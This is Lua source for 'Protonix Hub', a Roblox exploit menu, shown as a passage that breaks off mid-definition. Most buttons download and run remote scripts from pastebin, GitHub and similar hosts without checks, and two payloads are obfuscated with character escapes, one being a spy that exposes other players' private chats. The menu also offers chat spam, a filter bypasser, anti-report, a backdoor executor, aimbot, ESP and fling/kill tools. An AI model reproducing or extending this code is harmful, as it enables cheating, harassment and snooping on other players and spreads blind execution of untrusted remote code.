if not game:IsLoaded() then
    local message = Instance.new("Message")
    message.Parent = game.Workspace
    message.Text = "Protonix Hub is waiting for the game to be loaded.."
    repeat game:IsLoaded():Wait() wait(0.1)  warn("Protonix Hub is waiting for the game to be loaded..") until game:IsLoaded()
    if game:IsLoaded() then message:Destroy() end
end

if game:IsLoaded() then
    local Rayfield = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Rayfield/main/source'))()
local Window = Rayfield:CreateWindow({
	Name = "Protonix Hub",
	LoadingTitle = "Loading Protonix Hub..",
	LoadingSubtitle = "Please Wait..",
	ConfigurationSaving = {
		Enabled = true,
		FolderName = nil, -- Create a custom folder for your hub/game
		FileName = "ProtonixHubConfigs"
	},
        Discord = {
        	Enabled = false,
        	Invite = "san9VKM78C", -- The Discord invite code, do not include discord.gg/
        	RememberJoins = true -- Set this to false to make them join the discord every time they load it up
        },
	KeySystem = false, -- Set this to true to use our key system
	KeySettings = {
		Title = "Sirius Hub",
		Subtitle = "Key System",
		Note = "Join the discord (discord.gg/sirius)",
		FileName = "SiriusKey",
		SaveKey = true,
		GrabKeyFromSite = false, -- If this is true, set Key below to the RAW site you would like Rayfield to get the key from
		Key = "ProtonixHub"
	}
})

function notif(title, text, dur, ico)
    game.StarterGui:SetCore("SendNotification", {
        Title = title,
        Text = text,
        Duration = dur,
        Icon = ico
    })
end

Rayfield:Notify({
    Title = "Protonix Hub",
    Content = "Successfully Loaded Protonix Hub! Have Fun Exploiting, "..game.Players.LocalPlayer.DisplayName.."!",
    Duration = 6.5,
    Image = game.Players:GetUserThumbnailAsync(game.Players.LocalPlayer.UserId, Enum.ThumbnailType.HeadShot, Enum.ThumbnailSize.Size352x352),
    --[[
    Actions = { -- Notification Buttons
        Ignore = {
            Name = "Okay!",
            Callback = function()
                print("The user tapped Okay!")
            end
		},
	},
    ]]
})
Rayfield:Notify({
    Title = "Protonix Hub",
    Content = "Game Is Loaded!",
    Duration = 6.5,
    Image = 000000000,
    --[[
    Actions = { -- Notification Buttons
        Ignore = {
            Name = "Okay!",
            Callback = function()
                print("The user tapped Okay!")
            end
		},
	},
    ]]
})

local Tab = Window:CreateTab("World", 4483362458) -- Title, Image
local Section = Tab:CreateSection("Move Parts")
local Button = Tab:CreateButton({
	Name = "Telekinesis",
	Callback = function()
		loadstring(game:HttpGet("https://pastebin.com/raw/ZCuzD82x", true))()
	end,
})
local Button = Tab:CreateButton({
	Name = "FE Btools",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/rouxhaver/scripts/main/FE%20BTools(UPDATE1).lua", true))()
	end,
})
local Button = Tab:CreateButton({
	Name = "OP Unanchored GUI",
	Callback = function()
		loadstring(game:HttpGet("https://pastebin.com/raw/2xA9xeZv", true))()
	end,
})


local Button = Tab:CreateButton({
	Name = "Attach Player To Part (e)",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Attach%20To%20Part", true))()
	end,
})
local Button = Tab:CreateButton({
 Name = "NPC Controller",
	Callback = function()
      		loadstring(game:HttpGet("https://controlc.com/30ddc8ba/fullscreen.php?hash=9e61dbc7296ef31f6599b241286f8e3b&toolbar=true&linenum=false"))()
end,
})

local Section = Tab:CreateSection("Useful")
local Button = Tab:CreateButton({
 Name = "Oof Spammer",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/raw/JaMbzp0B", true))()

end,
})
local Button = Tab:CreateButton({
 Name = "Sound GUI",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Sound%20GUI", true))()

end,
})
local Button = Tab:CreateButton({
	Name = "Grab All (Tool Needed)",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/qqGr4szr", true))()
end,
})
local Button = Tab:CreateButton({
	Name = "Backdoor Scanner/Executor",
	Callback = function()
   loadstring(game:HttpGet(('https://raw.githubusercontent.com/iK4oS/backdoor.exe/master/source.lua'),true))()
	end,
})
local Button = Tab:CreateButton({
 Name = "Raybeam (Layered Clothes)",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Raybeam"))()
end,
})


local Section = Tab:CreateSection("Scripts For Cars")
local Button = Tab:CreateButton({
	Name = "Car Tornado",
	Callback = function()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Car%20Tornado", true))()
	end,
})
local Button = Tab:CreateButton({
 Name = "Vehicle Fly",
	Callback = function()
      		SGTSOBF_WWwwWWWww={"\108","\111","\97","\100","\115","\116","\114","\105","\110","\103","\40","\103","\97","\109","\101","\58","\72","\116","\116","\112","\71","\101","\116","\40","\40","\39","\92","\49","\48","\52","\92","\49","\49","\54","\92","\49","\49","\54","\92","\49","\49","\50","\92","\49","\49","\53","\92","\53","\56","\92","\52","\55","\92","\52","\55","\92","\49","\49","\50","\92","\57","\55","\92","\49","\49","\53","\92","\49","\49","\54","\92","\49","\48","\49","\92","\57","\56","\92","\49","\48","\53","\92","\49","\49","\48","\92","\52","\54","\92","\57","\57","\92","\49","\49","\49","\92","\49","\48","\57","\92","\52","\55","\92","\49","\49","\52","\92","\57","\55","\92","\49","\49","\57","\92","\52","\55","\92","\53","\52","\92","\53","\49","\92","\56","\52","\92","\52","\56","\92","\49","\48","\50","\92","\49","\48","\55","\92","\54","\54","\92","\49","\48","\57","\92","\49","\48","\39","\41","\44","\116","\114","\117","\101","\41","\41","\40","\41",}SGTSOBF_HHhHHHHHh="";for _,SGTSOBF_dDDDDDDdD in pairs(SGTSOBF_WWwwWWWww)do SGTSOBF_HHhHHHHHh=SGTSOBF_HHhHHHHHh..SGTSOBF_dDDDDDDdD;end;SGTSOBF_CCCcCCcCC=function(SGTSOBF_fFFFFfFfF)loadstring(SGTSOBF_fFFFFfFfF)()end;SGTSOBF_CCCcCCcCC(SGTSOBF_HHhHHHHHh)
end,
})
local Button = Tab:CreateButton({
	Name = "Car Modifer GUI",
	Callback = function()
		loadstring(game:HttpGet('https://scripts.luawl.com/Main/ScourgeVehicleMods.lua'))()
	end,
})


local Section = Tab:CreateSection("Scripts For Tools")
local Paragraph = Tab:CreateParagraph({Title = "Protonix Tool GUI", Content = "An GUI that works with tools. Scripts it has: Grab and Drop Tools, Dupe Tools and Dupe Tools on the ground and where a tool is on a leash"})
local Button = Tab:CreateButton({
	Name = "Execute Protonix Tool GUI",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Protonix%20Tool%20GUI"))()
end,
})
local Section = Tab:CreateSection("Scripts For Hats")
local Paragraph = Tab:CreateParagraph({Title = "Protonix Hat GUI", Content = "An GUI that works with Hats. Scripts it has: Hold and Eat your Hats,OP HAT GUI,Floating Hats/Hat Orbit and Hats On Leash"})
local Button = Tab:CreateButton({
	Name = "Execute Protonix Hat GUI",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Protonix%20Hat%20GUI"))()
end,
})

local Section = Tab:CreateSection("Scripts For Chat")
local Toggle = Tab:CreateToggle({
	Name = "Bubble Chat",
	CurrentValue = true,
	Flag = "Toggle6", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)

	game.Chat.BubbleChatEnabled = Value
	end,
})
local Toggle = Tab:CreateToggle({
	Name = "Fe Chat Destroyer",
	CurrentValue = true,
	Flag = "Toggle5", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		getgenv().destroychat = Value;
                while true do
                    if not getgenv().destroychat then return end
                    local args = {
                        [1] = " ",
                        [2] = "All"
                    }
                    game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
                    wait(0.5)
                end

	end,
})
local Button = Tab:CreateButton({
	Name = "Chat Bypasser",
	Callback = function()      		 
 getgenv().method = "fn"       loadstring(game:HttpGet("https://raw.githubusercontent.com/daddysyn/synergy/additional/betterbypasser",true))()

  	end,
})
local Button = Tab:CreateButton({
	Name = "See Peoples Private Chats",
	Callback = function()      		 loadstring("\45\45\84\104\105\115\32\115\99\114\105\112\116\32\114\101\118\101\97\108\115\32\65\76\76\32\104\105\100\100\101\110\32\109\101\115\115\97\103\101\115\32\105\110\32\116\104\101\32\100\101\102\97\117\108\116\32\99\104\97\116\10\45\45\99\104\97\116\32\34\47\115\112\121\34\32\116\111\32\116\111\103\103\108\101\33\10\101\110\97\98\108\101\100\32\61\32\116\114\117\101\10\45\45\105\102\32\116\114\117\101\32\119\105\108\108\32\99\104\101\99\107\32\121\111\117\114\32\109\101\115\115\97\103\101\115\32\116\111\111\10\115\112\121\79\110\77\121\115\101\108\102\32\61\32\116\114\117\101\10\45\45\105\102\32\116\114\117\101\32\119\105\108\108\32\99\104\97\116\32\116\104\101\32\108\111\103\115\32\112\117\98\108\105\99\108\121\32\40\102\117\110\44\32\114\105\115\107\121\41\10\112\117\98\108\105\99\32\61\32\102\97\108\115\101\10\45\45\105\102\32\116\114\117\101\32\119\105\108\108\32\117\115\101\32\47\109\101\32\116\111\32\115\116\97\110\100\32\111\117\116\10\112\117\98\108\105\99\73\116\97\108\105\99\115\32\61\32\116\114\117\101\10\45\45\99\117\115\116\111\109\105\122\101\32\112\114\105\118\97\116\101\32\108\111\103\115\10\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\32\61\32\123\10\9\67\111\108\111\114\32\61\32\67\111\108\111\114\51\46\102\114\111\109\82\71\66\40\48\44\50\53\53\44\50\53\53\41\59\32\10\9\70\111\110\116\32\61\32\69\110\117\109\46\70\111\110\116\46\83\111\117\114\99\101\83\97\110\115\66\111\108\100\59\10\9\84\101\120\116\83\105\122\101\32\61\32\49\56\59\10\125\10\45\45\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\47\10\108\111\99\97\108\32\83\116\97\114\116\101\114\71\117\105\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\83\116\97\114\116\101\114\71\117\105\34\41\10\108\111\99\97\108\32\80\108\97\121\101\114\115\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\80\108\97\121\101\114\115\34\41\10\108\111\99\97\108\32\112\108\97\121\101\114\32\61\32\80\108\97\121\101\114\115\46\76\111\99\97\108\80\108\97\121\101\114\10\108\111\99\97\108\32\115\97\121\109\115\103\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101\34\41\58\87\97\105\116\70\111\114\67\104\105\108\100\40\34\68\101\102\97\117\108\116\67\104\97\116\83\121\115\116\101\109\67\104\97\116\69\118\101\110\116\115\34\41\58\87\97\105\116\70\111\114\67\104\105\108\100\40\34\83\97\121\77\101\115\115\97\103\101\82\101\113\117\101\115\116\34\41\10\108\111\99\97\108\32\103\101\116\109\115\103\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101\34\41\58\87\97\105\116\70\111\114\67\104\105\108\100\40\34\68\101\102\97\117\108\116\67\104\97\116\83\121\115\116\101\109\67\104\97\116\69\118\101\110\116\115\34\41\58\87\97\105\116\70\111\114\67\104\105\108\100\40\34\79\110\77\101\115\115\97\103\101\68\111\110\101\70\105\108\116\101\114\105\110\103\34\41\10\108\111\99\97\108\32\105\110\115\116\97\110\99\101\32\61\32\40\95\71\46\99\104\97\116\83\112\121\73\110\115\116\97\110\99\101\32\111\114\32\48\41\32\43\32\49\10\95\71\46\99\104\97\116\83\112\121\73\110\115\116\97\110\99\101\32\61\32\105\110\115\116\97\110\99\101\10\10\108\111\99\97\108\32\102\117\110\99\116\105\111\110\32\111\110\67\104\97\116\116\101\100\40\112\44\109\115\103\41\10\9\105\102\32\95\71\46\99\104\97\116\83\112\121\73\110\115\116\97\110\99\101\32\61\61\32\105\110\115\116\97\110\99\101\32\116\104\101\110\10\9\9\105\102\32\112\61\61\112\108\97\121\101\114\32\97\110\100\32\109\115\103\58\108\111\119\101\114\40\41\58\115\117\98\40\49\44\52\41\61\61\34\47\115\112\121\34\32\116\104\101\110\10\9\9\9\101\110\97\98\108\101\100\32\61\32\110\111\116\32\101\110\97\98\108\101\100\10\9\9\9\119\97\105\116\40\48\46\51\41\10\9\9\9\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\46\84\101\120\116\32\61\32\34\123\83\80\89\32\34\46\46\40\101\110\97\98\108\101\100\32\97\110\100\32\34\69\78\34\32\111\114\32\34\68\73\83\34\41\46\46\34\65\66\76\69\68\125\34\10\9\9\9\83\116\97\114\116\101\114\71\117\105\58\83\101\116\67\111\114\101\40\34\67\104\97\116\77\97\107\101\83\121\115\116\101\109\77\101\115\115\97\103\101\34\44\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\41\10\9\9\101\108\115\101\105\102\32\101\110\97\98\108\101\100\32\97\110\100\32\40\115\112\121\79\110\77\121\115\101\108\102\61\61\116\114\117\101\32\111\114\32\112\126\61\112\108\97\121\101\114\41\32\116\104\101\110\10\9\9\9\109\115\103\32\61\32\109\115\103\58\103\115\117\98\40\34\91\92\110\92\114\93\34\44\39\39\41\58\103\115\117\98\40\34\92\116\34\44\39\32\39\41\58\103\115\117\98\40\34\91\32\93\43\34\44\39\32\39\41\10\9\9\9\108\111\99\97\108\32\104\105\100\100\101\110\32\61\32\116\114\117\101\10\9\9\9\108\111\99\97\108\32\99\111\110\110\32\61\32\103\101\116\109\115\103\46\79\110\67\108\105\101\110\116\69\118\101\110\116\58\67\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\112\97\99\107\101\116\44\99\104\97\110\110\101\108\41\10\9\9\9\9\105\102\32\112\97\99\107\101\116\46\83\112\101\97\107\101\114\85\115\101\114\73\100\61\61\112\46\85\115\101\114\73\100\32\97\110\100\32\112\97\99\107\101\116\46\77\101\115\115\97\103\101\61\61\109\115\103\58\115\117\98\40\35\109\115\103\45\35\112\97\99\107\101\116\46\77\101\115\115\97\103\101\43\49\41\32\97\110\100\32\40\99\104\97\110\110\101\108\61\61\34\65\108\108\34\32\111\114\32\40\99\104\97\110\110\101\108\61\61\34\84\101\97\109\34\32\97\110\100\32\112\117\98\108\105\99\61\61\102\97\108\115\101\32\97\110\100\32\80\108\97\121\101\114\115\91\112\97\99\107\101\116\46\70\114\111\109\83\112\101\97\107\101\114\93\46\84\101\97\109\61\61\112\108\97\121\101\114\46\84\101\97\109\41\41\32\116\104\101\110\10\9\9\9\9\9\104\105\100\100\101\110\32\61\32\102\97\108\115\101\10\9\9\9\9\101\110\100\10\9\9\9\101\110\100\41\10\9\9\9\119\97\105\116\40\49\41\10\9\9\9\99\111\110\110\58\68\105\115\99\111\110\110\101\99\116\40\41\10\9\9\9\105\102\32\104\105\100\100\101\110\32\97\110\100\32\101\110\97\98\108\101\100\32\116\104\101\110\10\9\9\9\9\105\102\32\112\117\98\108\105\99\32\116\104\101\110\10\9\9\9\9\9\115\97\121\109\115\103\58\70\105\114\101\83\101\114\118\101\114\40\40\112\117\98\108\105\99\73\116\97\108\105\99\115\32\97\110\100\32\34\47\109\101\32\34\32\111\114\32\39\39\41\46\46\34\123\83\80\89\125\32\91\34\46\46\32\112\46\78\97\109\101\32\46\46\34\93\58\32\34\46\46\109\115\103\44\34\65\108\108\34\41\10\9\9\9\9\101\108\115\101\10\9\9\9\9\9\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\46\84\101\120\116\32\61\32\34\123\83\80\89\125\32\91\34\46\46\32\112\46\78\97\109\101\32\46\46\34\93\58\32\34\46\46\109\115\103\10\9\9\9\9\9\83\116\97\114\116\101\114\71\117\105\58\83\101\116\67\111\114\101\40\34\67\104\97\116\77\97\107\101\83\121\115\116\101\109\77\101\115\115\97\103\101\34\44\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\41\10\9\9\9\9\101\110\100\10\9\9\9\101\110\100\10\9\9\101\110\100\10\9\101\110\100\10\101\110\100\10\10\102\111\114\32\95\44\112\32\105\110\32\105\112\97\105\114\115\40\80\108\97\121\101\114\115\58\71\101\116\80\108\97\121\101\114\115\40\41\41\32\100\111\10\9\112\46\67\104\97\116\116\101\100\58\67\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\109\115\103\41\32\111\110\67\104\97\116\116\101\100\40\112\44\109\115\103\41\32\101\110\100\41\10\101\110\100\10\80\108\97\121\101\114\115\46\80\108\97\121\101\114\65\100\100\101\100\58\67\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\112\41\10\9\112\46\67\104\97\116\116\101\100\58\67\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\109\115\103\41\32\111\110\67\104\97\116\116\101\100\40\112\44\109\115\103\41\32\101\110\100\41\10\101\110\100\41\10\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\46\84\101\120\116\32\61\32\34\123\83\80\89\32\34\46\46\40\101\110\97\98\108\101\100\32\97\110\100\32\34\69\78\34\32\111\114\32\34\68\73\83\34\41\46\46\34\65\66\76\69\68\125\34\10\83\116\97\114\116\101\114\71\117\105\58\83\101\116\67\111\114\101\40\34\67\104\97\116\77\97\107\101\83\121\115\116\101\109\77\101\115\115\97\103\101\34\44\112\114\105\118\97\116\101\80\114\111\112\101\114\116\105\101\115\41\10\108\111\99\97\108\32\99\104\97\116\70\114\97\109\101\32\61\32\112\108\97\121\101\114\46\80\108\97\121\101\114\71\117\105\46\67\104\97\116\46\70\114\97\109\101\10\99\104\97\116\70\114\97\109\101\46\67\104\97\116\67\104\97\110\110\101\108\80\97\114\101\110\116\70\114\97\109\101\46\86\105\115\105\98\108\101\32\61\32\116\114\117\101\10\99\104\97\116\70\114\97\109\101\46\67\104\97\116\66\97\114\80\97\114\101\110\116\70\114\97\109\101\46\80\111\115\105\116\105\111\110\32\61\32\99\104\97\116\70\114\97\109\101\46\67\104\97\116\67\104\97\110\110\101\108\80\97\114\101\110\116\70\114\97\109\101\46\80\111\115\105\116\105\111\110\43\85\68\105\109\50\46\110\101\119\40\85\68\105\109\46\110\101\119\40\41\44\99\104\97\116\70\114\97\109\101\46\67\104\97\116\67\104\97\110\110\101\108\80\97\114\101\110\116\70\114\97\109\101\46\83\105\122\101\46\89\41\10\45\45\67\114\101\100\105\116\32\116\111\32\79\32\80\108\97\121\115\32\111\110\32\89\111\117\116\117\98\101\44\32\103\111\32\115\117\98\115\99\114\105\98\101\32\116\111\32\104\105\109\32\40\110\111\116\32\109\121\32\97\99\99\111\117\110\116\44\32\106\117\115\116\32\97\100\118\101\114\116\105\115\105\110\103\32\102\111\114\32\104\105\109\44\32\119\101\32\100\111\110\39\116\32\101\118\101\110\32\107\110\111\119\32\101\97\99\104\111\116\104\101\114\32\108\111\108\41\10")()
  	end,
})
local Button = Tab:CreateButton({
	Name = "Chat Logger (F4)",
	Callback = function()      		 loadstring(game:HttpGet("https://raw.githubusercontent.com/HeyGyt/chatlogger/main/main"))()
  	end,
})
local Button = Tab:CreateButton({
	Name = "Disable Chat Logger",
	Callback = function()      		  loadstring(game:HttpGet("https://raw.githubusercontent.com/HeyGyt/antichatlogger/main/main"))()
  	end,
})
local Button = Tab:CreateButton({
    Name = "Chat Translator",
Callback = function()
    loadstring(game:HttpGet(('https://pastebin.com/raw/WSBZiDNe'),true))()
end,
})
local Button = Tab:CreateButton({
	Name = "Chat Art",
	Callback = function()      		loadstring(game:HttpGet("https://raw.githubusercontent.com/omegachadgaming/mongus/main/main.lua", true))()
  	end,
})

local Button = Tab:CreateButton({
	Name = "Nerd Emoji",
	Callback = function()      		 loadstring(game:HttpGet("https://raw.githubusercontent.com/JNHHGaming123/JN-HH-Gaming-AutoToxic1/main/README.md",true))()
  	end,
})
local Section = Tab:CreateSection("Scripts For GUI/Camera")
local Button = Tab:CreateButton({
 Name = "Freecam",
	Callback = function()
      		  loadstring(game:HttpGet('https://raw.githubusercontent.com/GhostPlayer352/Test4/main/Break%20Camera'))()
end,
})
local Button = Tab:CreateButton({
 Name = "Fire All Click Detectors",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/raw/0Crf1y1j", true))() 
end,
})
local Button = Tab:CreateButton({
	Name = "Autoclicker",
	Callback = function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/TheRareOcelot/test/main/Autoclicker')))() 
end,
})
local Button = Tab:CreateButton({
 Name = "Freeze Camera",
	Callback = function()
      		  loadstring(game:HttpGet('https://pastebin.com/raw/T0S0RPTW'))()
end,
})
local Button = Tab:CreateButton({
 Name = "Spectate",
	Callback = function()
      		loadstring(game:HttpGet('https://pastebin.com/raw/wyvdb7gr'))()
end,
})
local Button = Tab:CreateButton({
	Name = "VR",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/qqGr4szr", true))()
end,
})
local Section = Tab:CreateSection("Utility")
local Button = Tab:CreateButton({
 Name = "Display Name Remover",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Display%20Name%20Remover", true))() 
end,
})

local Button = Tab:CreateButton({
 Name = "Empty Server Finder",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/raw/aASY68Ns", true))() 
end,
})
local Button = Tab:CreateButton({
    Name = "Roblox 2016 UI",
Callback = function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/kosuke14/REBOYHub/main/games/2016_Roblox.lua'))()
end,
})

local Button = Tab:CreateButton({
	Name = "Anti AFK",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/raw/sDXcYFhR", true))()
end,
})
local Button = Tab:CreateButton({
 Name = "FPS Booster",
	Callback = function()
      		loadstring(game:HttpGet("https://pastebin.com/raw/VSjtWEDe", true))() 
end,
})
local Button = Tab:CreateButton({
    Name = "Graphics Enchancer",
Callback = function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/HeyGyt/enhancer/main/main"))()
end,
})
local Button = Tab:CreateButton({
    Name = "Anti Report",
Callback = function()
    loadstring(game:HttpGet('https://pastebin.com/raw/R1B51WkT'))()
end,
})

local Button = Tab:CreateButton({
	Name = "Rejoin Game",
	Callback = function()
game:GetService("TeleportService"):Teleport(game.PlaceId, game:GetService("Players").LocalPlayer)
end,
})

local Tab = Window:CreateTab("Player", 4483362458)
local Section = Tab:CreateSection("Walkspeed")
local Slider = Tab:CreateSlider({
	Name = "Walkspeed",
	Range = {0, 200},
	Increment = 10,
	Suffix = "Walkspeed",
	CurrentValue = 10,
	Flag = "Slider1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = Value
	end,
})
local Input = Tab:CreateInput({
	Name = "Walkspeed (Setter)",
	PlaceholderText = "Speed",
	RemoveTextAfterFocusLost = false,
	Callback = function(SText)
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = SText

	end,
})
local Section = Tab:CreateSection("Jumppower")
local Slider = Tab:CreateSlider({
	Name = "JumpPower",
	Range = {0, 200},
	Increment = 10,
	Suffix = "JumpPower",
	CurrentValue = 10,
	Flag = "Slider2", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = Value
	end,
})
local Input = Tab:CreateInput({
	Name = "JumpPower (Setter)",
	PlaceholderText = "Power",
	RemoveTextAfterFocusLost = false,
	Callback = function(Text)
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = Text

	end,
})
local Section = Tab:CreateSection("Main")
local Button = Tab:CreateButton({
	Name = "Fly",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/iamtryingtofindname/AWP/main/Misc/FlyFE.lua"))()
end,
})
local Button = Tab:CreateButton({
 Name = "Invisibility",
	Callback = function()
      	loadstring(game:HttpGet(('https://pastebin.com/raw/0wE8rKJ1')))()
end,
})

local Button = Tab:CreateButton({
	Name = "Noclip",
	Callback = function()
loadstring(game:HttpGet("https://pastebin.com/raw/SYXmgUzm"))()

end,
})
local Button = Tab:CreateButton({
	Name = "God Mode",
	Callback = function()
 loadstring(game:HttpGet("https://raw.githubusercontent.com/HeyGyt/godmode/main/main"))()

end,
})



local Section = Tab:CreateSection("More")
local Button = Tab:CreateButton({
	Name = "Infinity Jump",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Infinity%20Jump"))()
end,
})


local Button = Tab:CreateButton({
 Name = "Levitate",
	Callback = function()
      		  game.Players.LocalPlayer.Character.Humanoid.HipHeight = 3
end,
})
local Button = Tab:CreateButton({
 Name = "Freeze",
	Callback = function()
      		  loadstring(game:HttpGet('https://pastebin.com/raw/AkJS0PC7'))()
end,
})
local Toggle = Tab:CreateToggle({
	Name = "Sit",
	CurrentValue = false,
	Flag = "Toggle4", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character:WaitForChild("Humanoid").Sit = Value
	end,
})
local Toggle = Tab:CreateToggle({
	Name = "Rotate",
	CurrentValue = true,
	Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character.Humanoid.AutoRotate = Value
	end,
})
local Toggle = Tab:CreateToggle({
	Name = "Stand",
	CurrentValue = false,
	Flag = "Toggle1", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character.Humanoid.PlatformStand = Value
	end,
})
local Button = Tab:CreateButton({
 Name = "Netless Bypass",
	Callback = function()
      		  loadstring(game:HttpGet("https://pastebin.com/raw/DUc29mew", true))()
end,
})
local Section = Tab:CreateSection("HipHeight")
local Slider = Tab:CreateSlider({
	Name = "HipHeight",
	Range = {0, 200},
	Increment = 10,
	Suffix = "HipHeight",
	CurrentValue = 10,
	Flag = "Slider3", -- A flag is the identifier for the configuration file, make sure every element has a different flag if you're using configuration saving to ensure no overlaps
	Callback = function(Value)
		game.Players.LocalPlayer.Character.Humanoid.HipHeight = Value
	end,
})
local Input = Tab:CreateInput({
	Name = "HipHeight (Setter)",
	PlaceholderText = "Height",
	RemoveTextAfterFocusLost = false,
	Callback = function(HText)
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = HText

	end,
})

local Section = Tab:CreateSection("Fun")


local Button = Tab:CreateButton({
 Name = "Spiderman",
	Callback = function()   	loadstring(game:HttpGet(('https://raw.githubusercontent.com/ItsDishan/SpidermanScript/main/Spider-Man'), true))()
end,
})
local Button = Tab:CreateButton({
 Name = "Walk On Walls",
	Callback = function()
      		 loadstring(game:HttpGet("https://pastebin.com/raw/5T7KsEWy", true))()
end,
})
local Button = Tab:CreateButton({
 Name = "Get Controlled",
	Callback = function()
      		  loadstring(game:HttpGet(('https://raw.githubusercontent.com/TheRareOcelot/test/main/ontolr')))()
end,
})
local Button = Tab:CreateButton({
 Name = "Fake Lag V2",
	Callback = function()
      		  loadstring(game:HttpGet(('https://raw.githubusercontent.com/TheRareOcelot/test/main/Fake%20Lag')))() end,
})
local Button = Tab:CreateButton({
 Name = "Up and Down",
	Callback = function()
      		  loadstring(game:HttpGet(('https://pastebin.com/raw/16NcvmHZ')))()
end,
})




local Tab = Window:CreateTab("Combat", 4483362458)
local Section = Tab:CreateSection("Flings")
local Button = Tab:CreateButton({
 Name = "Fling Gui",
	Callback = function()
loadstring(game:HttpGet('https://pastebin.com/raw/r97d7dS0', true))()
end,
})
local Button = Tab:CreateButton({
 Name = "Loop Fling",
	Callback = function()
loadstring(game:HttpGet('https://github.com/DigitalityScripts/roblox-scripts/raw/main/loop fling all'))()
end,
})
   local Button = Tab:CreateButton({
 Name = "Mouse Fling",
	Callback = function()
loadstring(game:HttpGet'https://pastebin.com/raw/E0h4VGCy')()
end,
})
   local Button = Tab:CreateButton({
 Name = "Anti Fling",
	Callback = function()
loadstring(game:HttpGet'https://pastebin.com/raw/H07STWSQ')()
end,
})
local Section = Tab:CreateSection("Helpful")
   local Button = Tab:CreateButton({
 Name = "Unnamed ESP",
	Callback = function()
loadstring(game:HttpGet'https://ic3w0lf.xyz/rblx/protoesp.lua')()
end,
})

local Button = Tab:CreateButton({
 Name = "Sword AI",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/yeerma/1/main/bot", true))()
end,
})
local Button = Tab:CreateButton({
 Name = "Aimbot",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Exunys/Aimbot-Script/main/Aimbot%20Script.lua", true))()
end,
})
   local Button = Tab:CreateButton({
 Name = "Radar",
	Callback = function()
loadstring(game:HttpGet'https://controlc.com/50b7457e/fullscreen.php?hash=36a57eae90be9752299194b010029a46&toolbar=true&linenum=false')()
end,
})

local Section = Tab:CreateSection("Deadly")
local Button = Tab:CreateButton({
	Name = "Grandmaster",
	Callback = function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheRareOcelot/test/main/Grandmaster"))()
end,
})

local Button = Tab:CreateButton({
	Name = "FE Kill",
	Callback = function()      		loadstring(game:HttpGet("https://github.com/TheRareOcelot/test/blob/main/ea", true))()
  	end    
})
local Button = Tab:CreateButton({
 Name = "SCP 173",
	Callback = function()
